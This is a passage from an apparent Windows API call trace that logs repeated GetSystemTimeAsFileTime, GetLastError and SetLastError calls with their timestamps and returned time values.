lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetLastError () returned 0x0 [0201.637] SetLastError (dwErrCode=0x0) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.639] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184c1430, dwHighDateTime=0x1d4be3b)) [0201.641] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.642] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x184e7590, dwHighDateTime=0x1d4be3b)) [0201.643] 